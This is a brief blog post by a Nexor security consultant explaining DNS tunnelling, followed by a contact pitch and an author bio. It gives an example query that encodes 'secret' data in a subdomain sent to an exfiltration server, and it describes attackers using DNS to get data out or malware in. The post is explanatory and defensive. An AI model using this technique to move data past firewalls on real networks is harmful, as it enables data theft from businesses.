DNS Tunnelling
A recent project at Nexor required us to look at the challenges of providing access to the DNS from a secure environment. It reminded me of the issues related to DNS tunnelling.
DNS tunnelling enables a user to run a full TCP/IP stack over the top of the DNS protocol. This is especially useful when a firewall is blocking outbound ports. DNS tunnelling is not new, and surprisingly simple to do. For example, the following DNS query:
secret_data_sent_via_dns.infoleak.nexor.com
Will pass the message 'secret_data_sent_via_dns' to the server infoleak.nexor.com (data leaving network). The server might respond:
Response.infoleak.nexor.com. 0 IN TXT 'Message received – thanks'
Thus two way data communication has occurred. Once you have two way communication, you can run any communication protocol of your choice, including TCP/IP. Sadly DNS tunnelling means a firewall is now pretty much useless as a tool to control the network traffic that leaves a business. As an attacker, once you have managed to get software to execute on the inside of a firewall, you can use the DNS to set up a communication tunnel to get data out (or more malware in). Is this a problem that concerns your business? If so, contact Nexor to find out how we can help solve the problem.
About the author
Colin Robbins is a Principal Security Consultant, leading customer-funded research activities in secure interoperability and information exchange. He has specific technical interests in the Single Information Environment and Data Centric Security, as well as the processes of security, such as Secure by Design and Information Security Management Systems (ISMS). He is a Fellow of CIISec, and a former NCSC certified Security and Information Risk Adviser (Lead CCP).